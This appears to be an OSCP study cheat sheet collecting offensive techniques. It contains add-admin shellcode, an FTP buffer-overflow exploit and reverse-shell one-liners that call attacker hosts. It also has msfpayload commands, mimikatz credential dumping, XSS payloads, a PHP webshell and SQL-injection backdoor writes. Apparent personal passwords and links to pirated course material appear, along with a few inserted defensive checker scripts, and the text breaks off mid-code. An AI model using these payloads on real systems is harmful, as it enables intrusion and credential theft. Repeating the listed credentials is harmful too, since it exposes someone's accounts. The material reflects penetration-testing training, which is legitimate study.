CheatSheets OSCP
-----------------
Title: Add Admin User Shellcode (194 bytes) - Any Windows Version
Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
Username: BroK3n
Password: BroK3n
-----------------
char shellcode[] =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
Discovery of Missing Patches (manual or automatic methods)
Manually this can be done easily by executing a command which enumerates all the installed patches.
Metasploit
The Metasploit post module below lists the missing patches by Knowledge Base number, and specifically the patches for which there is a Metasploit module.
$ post/windows/gather/enum_patches
PowerShell
Sherlock (https://github.com/rasta-mouse/Sherlock) will check a system for the following:
Description | Security Bulletin | KB | Operating System
Windows Kernel Mode Drivers | MS16-135 | 3199135 | Windows Server 2016
Secondary Logon Handle | MS16-032 | 3143141 | Windows Server 2008, 7, 8, 10, Windows Server 2012
WebDAV | MS16-016 | 3136041 | Windows Server 2008, Vista, 7
Windows Kernel Mode Drivers | MS15-051 | 3057191 | Windows Server 2003, Windows Server 2008, Windows 7, Windows 8, Windows 2012
Win32k.sys | MS14-058 | 3000061 | Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8
AFD Driver | MS14-040 | 2975684 | Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Kernel | MS14-002 | 2914368 | Windows XP, Windows Server 2003
Kernel Mode Driver | MS13-005 | 2778930 | Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Task Scheduler | MS10-092 | 2305420 | Windows Server 2008, 7
KiTrap0D | MS10-015 | 977165 | Windows Server 2003, Windows Server 2008, 7, XP
NDProxy | MS14-002 | 2914368 | Windows Server 2003, XP
Kernel Driver | MS15-061 | 3057839 | Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
AFD.sys | MS11-080 | 2592799 | Windows Server 2003, XP
NDISTAPI | MS11-062 | 2566454 | Windows Server 2003, XP
RPC | MS15-076 | 3067505 | Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Hot Potato | MS16-075 | 3164038 | Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Kernel Driver | MS15-010 | 3036220 | Windows Server 2003, Windows Server 2008, 7, XP
AFD.sys | MS11-046 | 2503665 | Windows Server 2003, Windows Server 2008, 7, XP
Exploit sources listed for these rows: Github, ExploitDB, Metasploit, PowerShell, HotPotato, EXE
############LINUX#####################
research the target machine on linux
using uname -a determine the kernel version and check whether there is a known privilege escalation exploit for it
www.exploit-db.com/exploits/18411/
download it to the target machine --- note: the potential machine IP ends with 240
compile:
gcc exploit.c -o exploit
run it and you have root privileges ;D
read the lab guide for more references (video 82)
###############WINDOWS#####################
notes on privilege escalation in windows
ms011: this bug is a classic example of a user-mode to kernel transition with an unchecked buffer that overwrites kernel space.
gains SYSTEM-level execution on Windows XP and Windows 2003, 32-bit and 64-bit.
python exploit
www.exploit-db.com/exploits/18176/
install the dependencies needed in the tools directory (PyInstaller and the other files in the tools folder),
then copy the exploit to that folder and compile it
updates reduce this class of bug; administrative errors remain:
mishandling file and folder user permissions allows privilege escalation
windows services
if the file permissions on the service binary are not taken care of (full or read/write access to the service),
a malicious file put in its place is executed with SYSTEM privileges
#lab example
net user lowpriv mypass /add
net localgroup "Remote Desktop users" lowpriv /add
check the service in services.msc
run icacls (integrity control ACLs) on the service exe
to check whether the service exe is writable by Everyone, not just by Administrators:
scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Administrators:(I)(F)
               BUILTIN\Users:(I)(RX)
               Everyone:(CI)(F)
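A defender-side check for the misconfiguration above, added here as an example (it is not part of the original notes): it parses icacls output in the form shown and flags service binaries that Everyone or another broad group can modify. The icacls text is a constructed sample built from the scsiaccess.exe lines above; the rights letters and principal names are the standard icacls ones.

```python
import re

# Rights that let a principal replace or alter the binary: full control,
# modify, generic write, write data, write DAC, write owner.
WRITE_RIGHTS = {"F", "M", "W", "WD", "WDAC", "WO"}

# Principals that should never hold write rights on a service executable.
BROAD_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# Constructed sample: the icacls output shown in the notes for scsiaccess.exe.
SAMPLE_ICACLS = """\
scsiaccess.exe NT AUTHORITY\\SYSTEM:(I)(F)
               BUILTIN\\Administrators:(I)(F)
               BUILTIN\\Users:(I)(RX)
               Everyone:(CI)(F)
"""

# One ACE: principal, colon, one or more parenthesised flag groups.
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(output):
    """Return [(path, principal, set_of_flags)] for each ACE in icacls output.

    icacls prints the path only on the first ACE line of a file; continuation
    lines are indented. Paths containing spaces would need quoting first.
    """
    entries = []
    path = None
    for raw in output.splitlines():
        if not raw.strip():
            continue
        line = raw
        if not raw[0].isspace():            # first line of a file: path, then ACE
            path, _, line = raw.partition(" ")
        m = ACE_RE.match(line.strip())
        if m is None:
            continue                        # e.g. "Successfully processed 1 files"
        flags = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            flags.update(f.strip() for f in group.split(","))   # "(DE,WD)" style
        entries.append((path, m.group("principal"), flags))
    return entries


def writable_by_broad_principals(entries):
    """Return [(path, principal, sorted_flags)] where a broad principal can modify the file."""
    findings = []
    for path, principal, flags in entries:
        if principal.lower() in BROAD_PRINCIPALS and flags & WRITE_RIGHTS:
            findings.append((path, principal, sorted(flags)))
    return findings


if __name__ == "__main__":
    for path, principal, flags in writable_by_broad_principals(parse_icacls(SAMPLE_ICACLS)):
        print(f"{path}: {principal} has {' '.join(flags)} - service binary is replaceable")
```

Feed it the output of icacls run against each service's binary path (sc qc reports the path) to get the list of binaries whose ACL must be tightened; the fix is to remove the write right for the broad principal, not to change the service account.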
sqlmap tamper scripts (space replacement):
- Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'). Useful to bypass several web application firewalls.
- Replaces space character (' ') with comments '/**_**/'. Useful to bypass weak and bespoke web application firewalls.
- Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'). Useful to bypass several web application firewalls. Used during the ModSecurity SQL injection challenge.
- Replaces space character (' ') with a random blank character from a valid set of alternate characters.
- Replaces space character (' ') with a pound character ('#') followed by a new line ('\n'). Useful to bypass several web application firewalls.
- Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n'). Useful to bypass several web application firewalls.
- Replaces space character (' ') with plus ('+'). Is this any useful? The plus gets url-encoded by the sqlmap engine, invalidating the query.
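The substitutions listed above all exploit the same weakness: a filter that matches on literal spaces. The normaliser below is an added example (not sqlmap code and not from the original notes) of what a WAF rule or log-analysis job should do before matching: URL-decode until stable, then collapse block comments, '#...\n' and '--\n' line comments, alternate blank characters and '+' back to single spaces. The sample inputs in the test are constructed.

```python
import re
from urllib.parse import unquote_plus

# Comment forms the space2* tampers above substitute for a space.
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)     # /**/ and /**_**/
HASH_COMMENT = re.compile(r"#[^\n]*(?:\n|$)")            # '#' + random string + newline
DASH_COMMENT = re.compile(r"--[^\n]*(?:\n|$)")           # '--' + newline
# Alternate blanks: tab, newline, vertical tab, form feed, CR, no-break space.
ALT_BLANKS = re.compile(r"[\t\n\x0b\x0c\r\xa0]+")

UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """URL-decode until the value stops changing, so %2527 (double-encoded quote)
    and '+' (form-encoded space, the space2plus case) are both seen decoded."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize_sql_spacing(value):
    """Collapse every space substitute back to a single space."""
    text = fully_decode(value)
    text = BLOCK_COMMENT.sub(" ", text)
    text = HASH_COMMENT.sub(" ", text)
    text = DASH_COMMENT.sub(" ", text)
    text = ALT_BLANKS.sub(" ", text)
    return re.sub(r" {2,}", " ", text).strip()


def looks_like_union_injection(value):
    """Match a UNION SELECT only after normalisation, so the tampers do not hide it."""
    return bool(UNION_SELECT.search(normalize_sql_spacing(value)))


if __name__ == "__main__":
    # Constructed sample: the same query wrapped three different ways.
    for sample in ["1'/**_**/UNION/**_**/SELECT/**_**/1,2",
                   "1'%23x9f2a%0AUNION%23zz%0ASELECT%201,2",
                   "1'--%0AUNION--%0ASELECT+1,2"]:
        print(repr(sample), "->", repr(normalize_sql_spacing(sample)))
```

Because '+' is decoded to a space, a legitimate arithmetic '1+1' also becomes '1 1'; that is acceptable for a detector that only needs the keywords to line up, but the raw value should still be logged alongside the normalised one.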
view jmp_esp.png
create payload:
buf = ""
buf += "\xbe\x91\xab\x8d\xbd\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x18\x83\xed\xfc\x31\x75\x0f\x03\x75\x9e\x49"
buf += "\x78\x41\x91\x56\xe7\x31\x92\x58\x63\x05\x18\x12\x23"
buf += "\x9a\xab\x36\x4f\xd0\x8b\x9b\xe2\x5b\xc8\xe5\xc1\x51"
buf += "\xfd\xb6\x0b\xe3\xee\xc2\x06\x03\x7b\x91\xea\x98\x37"
buf += "\x1f\x6b\x14\x8b\x12\x97\x2b\xfa\xa6\xe6\x73\xfd\x50"
buf += "\x63\xf2\xc1\xa1\x9a\xf6\x50\xae\x31\x93\xa3\xc4\xb7"
buf += "\x9c\x73\x8f\xd0\xa2\xdb\xa7\x2a\x4b\x19\xc8\x2b\x37"
buf += "\x94\x29\x78\xf0\xaa\xfa\x2e\xa9\xe3\x96\xc0\x04\x54"
buf += "\x31\x1e\x43"
Modify exploit:
#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [[email protected]]
#Date: 10.06.2006
import sys
from socket import *

# payload from msfencode -t python (see "create payload" above)
buf = ""
buf += "\xbe\x91\xab\x8d\xbd\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x18\x83\xed\xfc\x31\x75\x0f\x03\x75\x9e\x49"
buf += "\x78\x41\x91\x56\xe7\x31\x92\x58\x63\x05\x18\x12\x23"
buf += "\x9a\xab\x36\x4f\xd0\x8b\x9b\xe2\x5b\xc8\xe5\xc1\x51"
buf += "\xfd\xb6\x0b\xe3\xee\xc2\x06\x03\x7b\x91\xea\x98\x37"
buf += "\x1f\x6b\x14\x8b\x12\x97\x2b\xfa\xa6\xe6\x73\xfd\x50"
buf += "\x63\xf2\xc1\xa1\x9a\xf6\x50\xae\x31\x93\xa3\xc4\xb7"
buf += "\x9c\x73\x8f\xd0\xa2\xdb\xa7\x2a\x4b\x19\xc8\x2b\x37"
buf += "\x94\x29\x78\xf0\xaa\xfa\x2e\xa9\xe3\x96\xc0\x04\x54"
buf += "\x31\x1e\x43"

def intel_order(i):
    # pack a 32-bit value little-endian, the byte order x86 expects for an address
    a = chr(i % 256)
    i = i >> 8
    b = chr(i % 256)
    i = i >> 8
    c = chr(i % 256)
    i = i >> 8
    d = chr(i % 256)
    packed = "%c%c%c%c" % (a, b, c, d)   # renamed from 'str' so the builtin is not shadowed
    return packed

host = sys.argv[1]
port = 21
user = "ftp"
password = "ftp"
EIP = 0x77fb59cc #JMP ESP from ntdll.dll
# 'buffer' (padding + intel_order(EIP) + buf) is assembled by the full exploit;
# that part of the script is not reproduced in these notes
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()
Create handler:
Launch exploit:
len: 844
get a shell:
meterpreter >
get proof.txt:
On my machine:
privilege escalation:
see system_shell.png
168.23.10 LPORT=444 R | msfencode -b '\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c' -t python
PAYLOAD=windows/meterpreter/reverse_ord_tcp e
https://sathisharthars.wordpress.com/2015/01/28/oscp-offensive-security-certified-professional-handy-tips-and-tricks/
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scripts/vulscan
Nikto Scanner:
WordPress Scanner:
Uniscan Scanning:
Skipfish Scanning:
2) fragment
4) use auxiliary/scanner/ip/ipidseq to find a zombie IP in the network, then use it for an idle scan: nmap -sI zombie_ip target
nc -v -w 1 target -z 1-1000
US Scanning:
Unicornscan Scanning:
Kernel Scanning:
nmblookup -A target
rpcclient -U "" target
enum4linux target
SNMP Enumeration:
snmpwalk -v 1 -c public IP
snmpbulkwalk -v 2 -c public IP
Plink Tunnel:
Mimikatz:
privilege::debug
sekurlsa::logonPasswords full
Netcat commands:
c:> nc -l -p 31337
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt
Banner Grabbing:
nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: SPOOFED-BROWSER
Referer: K0NSP1RACY.COM
<enter>
<enter>
Python:
PID:
cd /root/.wine/drive_c/MinGW/bin
wine ability.exe
NASM Command:
nasm -f bin -o payload.bin payload.asm
SSH Pivoting:
use auxiliary/server/socks4a
run
searchsploit-rb --update
Metasploit Payloads:
msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py
Create a Reverse ASP Shell
msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh
msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php
# lsof +L1
# getent group
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
pad with garbage up to the EIP offset, then place the JMP ESP address in EIP (ESP then points at the shellcode)
SEH:
!mona suggest
!mona nosafeseh
nseh="\xeb\x06\x90\x90" (next SEH chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETURN, i.e. POP r32, POP r32, RETN)
ROP (DEP):
!mona modules
!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
ASLR:
!mona noaslr
EGG Hunter:
break *_start
Continue Execution :
continue
c
Data :
$17 = 13
Reverse Shellcode:
BASH:
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1
PERL:
RUBY:
PHP:
This code assumes that the TCP connection uses file descriptor 3.
NETCAT:
Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
TELNET:
XTERM:
To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do th
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
xhost + # Run this INSIDE the spawned xterm on the open X Server
Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
Or:
$ DISPLAY=attackerip:0 xterm
Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
PHP:
<script>document.location=http://IP:PORT</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC="jav ascript:alert('XSS');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
"><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
http://www.0daysecurity.com/penetration-testing/enumeration.html
Windows Shellcode:
http://farlight.org/index.html?type=shellcode
http://shell-storm.org/shellcode/
http://www.windowsexploits.com/
http://www.xenuser.org/xss-cheat-sheet/
https://gist.github.com/sseffa/11031135
https://html5sec.org/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://roo7break.co.uk/?p=215
Webshells:
http://www.r57shell.net/
Nikto Tutorial:
http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/
Exploit-db:
wget http://exploit-db.com/archive.tar.bz2
SNMP Enumeration:
http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09
http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html
SAMBA Enumeration:
http://www.iodigitalsec.com/windows-null-session-enumeration/
http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html
http://www.madirish.net/59
Passing The Hash:
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/
Hashcat Tutorial:
http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/
Wordlist Download:
https://wiki.skullsecurity.org/Passwords
http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html
NASM Tutorial:
http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm
Buffer overflow Tutorial:
I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains exploits from basic to intermediate level with step by step debugging.
http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html
http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
ADVANCED:
Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided the most comprehensive guides on exploit development and keeps updating them from time to time that I have ever seen).
Exploit writing tutorial part 1: Stack Based Overflows – http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
Exploit writing tutorial part 2 – http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
Exploit writing tutorial part 3: SEH – http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
Exploit writing tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
Exploit writing tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
Exploit writing tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
Exploit writing tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
Exploit writing tutorial part 7: Unicode – http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
Exploit writing tutorial part 8: Win32 egg hunting – http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
Exploit writing tutorial part 9: Introduction to Win32 shellcoding – http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://resources.infosecinstitute.com/backdoor-sql-injection/
RFI/LFI Tutorials:
https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/
http://www.hackersonlineclub.com/lfi-rfi
https://0xzoidberg.wordpress.com/category/security/lfi-rfi/
NMAP Vulscan:
http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz
http://www.objectif-securite.ch/
http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html
Windows Privilege Escalation:
http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html
http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://www.rebootuser.com/?p=1758
Useful Links:
Videos:
http://www.securitytube.net/
http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)
http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Security Lectures)
https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)
https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)
https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)
For those who do not have enough lab time to compile their Windows exploits, I recommend downloading and compiling using Visual Studio and GNU Code-blocks; really, it will be very useful at the time of the exam.
https://www.securitysift.com/offsec-pwb-oscp/
I uploaded those pre-compiled exploits to MediaFire, password protected, but I discourage that because exploit compilation is one of the exercises in the course, so you have to do it on your own. If anyone needs that, mail me at [email protected] (Note: don't try to bruteforce it, it's more than 20 words).
http://www.securitysift.com/download/MS_privesc_and_exploits_table.csv
I hope it will be helpful for guys doing OSCP training and the exam. If you have any doubts related to the post, ping me…
Tags: (OSCP), offsec, oscp exam hints, oscp exam tips, oscp lab hints, oscp lab tips, oscp tips, OSCP Tips and Tricks, oscp tricks, Penetration Testing with Kali Linux, The Offensive Security Certified Professional
Sans 710: https://mega.nz/#!QNRxSaLY!sRHMVAyZ8f9Fqaq2O-g-5dVmU4WfIczgeaMz98kPGps
Sans 560: http://certcollection.org/forum/topic/292558-mega-sans-560-network-penetration-testing/
Sans 517: http://certcollection.org/forum/topic/292541-mega-sans-517-cutting-edge-hacking-techniques/
Sans 531: http://certcollection.org/forum/topic/292540-mega-sans-531-sans-windows-command-line-kung-fu/
Sans 617: http://certcollection.org/forum/topic/292539-mega-sans-617-wireless-ethical-hacking-penetration-testing-
Sans 506: http://certcollection.org/forum/topic/292493-mega-sans-506-securing-linuxunix/
Sans 508: http://certcollection.org/forum/topic/292127-mega-sans-508-advanced-digital-forensics-and-incident-response/
Sans 503: http://certcollection.org/forum/topic/292121-mega-sans-503-intrusion-detection-in-depth/
Sans 502: http://certcollection.org/forum/topic/292106-mega-sans-502-perimeter-protection-in-depth/
Sans 401: http://certcollection.org/forum/topic/292086-mega-sans-401-security-essentials/
Sans 610: http://certcollection.org/forum/topic/288694-mega-sans-610-reverse-engineering-malware/
Sans 660: http://certcollection.org/forum/topic/288708-mega-sans-660-advanced-pentration-testing-exploits-gxpn/
https://lab.pentestit.ru/
alok.3181
qwerty@123
mega.nz
5>]Y$gj@W<gC4JHJ
Awesome CTF
Captf.com -- search github
#CTF #wargame
https://io.netgarage.org/
http://reversing.kr/index.php
https://exploit-exercises.com/
http://smashthestack.org/
https://www.root-me.org/?page=news&lang=en
https://www.pwnerrank.com/categories/binary-exploitation/
https://w3challs.com/
https://pwnable.tw/
https://www.vulnhub.com/
https://ctftime.org/ctfs
https://shellterlabs.com/en/
reverse_shell_all:
https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells
whereis gcc
-----------php----------
upload the snippet below as .png or send it as part of the input
<? readfile("/etc/passwd"); ?>
<? echo('test') ?> - test in burp; if it works, replace test with the base64 of a reverse php shell
Try in burp:
<?php
$out = file_get_contents($_REQUEST['f']);
echo "<pre>$out</pre>";
?>
if it works, injection is present; try the command execution snippet below:
<?php
$cmd = ($_REQUEST["cmd"]);
$outt = exec($cmd);
echo "<pre>$outt</pre>";
?>
in browser: hash.php
try hash.php?cmd=pwd
nc -c /bin/sh 192.168.56.101 5600
nc -lvp 5600
python -c 'import pty; pty.spawn("/bin/bash")'
remote execution functions :: https://sekurak.pl/backdoory-w-aplikacjach-php/
Below can be used with id and password box as well and then bd.php?cmd=ls
union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,vers
whereis nc
/bin/nc.traditional 192.168.0.192 443 -e /bin/sh
for scan:
us -H -msf -Iv 192.168.1.88 -p 1-65535 && us -H -mU -Iv 192.168.1.88 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.88
echo os.system('/bin/bash')
get root if mysql is running as root: (login to mysql ==> mysql -h localhost -u root -p ; check for the password in the config files or using sqlmap)
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://bernardodamele.blogspot.in/2009/01/command-execution-with-mysql-udf.html
mysql> select sys_exec('usermod -a -G admin john');
smbservice:
nmblookup -A ip
smbclient -L \\SHARE -I IPaddress -N
rsa-key predict:
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2UqUGIzIu/WwgztLZs5/D9IyhtRWocyQPEkcPJz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOcW
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPF
ssh -i 57c3115d77c56390332dc5c49978627a-5429 [email protected]
showmount -e ipaddress
if the result shows / exported to * (everyone), then:
mkdir /metafs # this will be the mount point
mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking
//privilege escalation
/var/mysqli_connect.php has root password
ssh using this password
mount_nfs_share:
to check: showmount -e ipaddress
mkdir /tmp/nfs
mount -t nfs 192.168.1.72:/home/vulnix /tmp/nfs -o nolock
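Both NFS cases above come down to the server's export list: a path exported to every host, writable, and without root_squash is what makes the mount useful to an intruder. The checker below is an added example (not from the original notes) that parses an /etc/exports file and labels the risky entries; the exports file is a constructed sample in which the first line mirrors the "/ exported to *" case above.

```python
# Constructed sample /etc/exports: the first line is the kind of export the
# notes above mount (everything, writable by any host, remote root kept as root).
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/              *(rw,sync,no_root_squash,no_subtree_check)
/home/vulnix   *(rw,sync,no_subtree_check)
/srv/backup    10.0.0.0/24(ro,sync,root_squash)
/srv/scratch   192.168.1.0/24(rw,no_root_squash) build-host(rw)
"""


def parse_exports(text):
    """Return [(path, client, {options})] per client entry.

    exports(5) syntax: path, then whitespace-separated client(options) entries;
    options never contain spaces. A path with no clients is exported to everyone.
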